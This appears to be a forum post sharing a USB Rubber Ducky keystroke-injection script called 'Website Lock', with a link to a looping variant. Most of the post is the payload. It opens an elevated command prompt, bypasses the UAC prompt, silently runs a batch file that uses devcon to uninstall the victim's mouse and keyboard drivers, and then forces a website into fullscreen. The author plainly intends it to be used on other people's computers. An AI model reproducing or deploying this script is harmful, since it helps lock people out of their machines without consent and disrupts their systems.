The explanation is in the code. Link to other files: (same link as the one in the code) Side note: If you want to be a bastard and prevent them from using any mouse and keyboard at all until they restart here is the link to a looping version of the batch file: It continually does a devcon command to uninstall all mouse and keyboard drivers--even if they were just installed. To use it just replace the other one with this one. Mind you: if you run this on your computer you WILL NOT be able to do anything unless you restart you computer or you have a weird-ass way of controlling your computer without a mouse and keyboard. (Telekinesis?) Code: ``` REM Title: Website Lock REM Author: Audiack REM Target Ducky Encoder: 2.6.2 REM Target OS: Windows 7 (32 and 64 bit), maybe older/newer windows versions. Haven't tested it on any other than 7. REM Description: Plays off of Aprizm's script to open a website, but it also disables the mouse and keyboard so the user can't leave the website. REM Info: REM The user can easily unplug and re-plug in the keyboard/mouse to reinstall the drivers get them working again. REM This requires the user to plug a USB drive in BEFORE the ducky is plugged in. REM The files are here: REM Make sure the files are in the root of a drive called DUCKY. REM Twin duck works well with this. It is what I used when I was testing it. REM File Descriptions: REM The devcon32 & devcon64 are the files used to uninstall the keyboard and mouse drivers (for the two architectures). REM The invisible.vbs is used to run the batch script invisibly after the video is in fullscreen. REM The TheRealAnnoyance.bat is the batch script run in the background that disables their mouse & keyboard. REM The WebsiteLink.txt contains the website link. The user can change this as desired. Make sure there are no spaces and there is only a single link. REM If you are going to modify the website link as a youtube video, it needs to be in this format: REM Find the youtube video you want, then take the part after watch?v= and put it in place of sCNrK-n68CM in the above link. DELAY 3000 CTRL ESC DELAY 700 STRING cmd CTRL-SHIFT ENTER DELAY 3000 ALT Y DELAY 700 STRING for /f %d in ('wmic.exe volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d ENTER DELAY 1200 STRING cd /d %myd% ENTER DELAY 1000 STRING type "WebsiteLink.txt" | clip ENTER DELAY 100 STRING C:/windows/System32/wscript.exe invisible.vbs TheRealAnnoyance.bat ENTER DELAY 400 REM Aprizm's code for youtube roller begins here. I changed the link to a ctrl-v so that the ducky pastes the contents of WebsiteLink.txt hence the above line of code: 'type "WebsiteLink.txt" | clip' REM Title: Youtube Roller REM Author: Aprizm REM Description: This scripts opens a youtube video in fullscreen and puts the browser in fullscreen REM Option : if you change the link of the video dont forget to change the watch with watch_popup to have it fullscreen also add &loop=1 at the end to make it loop forever DELAY 200 GUI r DELAY 200 CTRL V ENTER DELAY 1000 F11 ```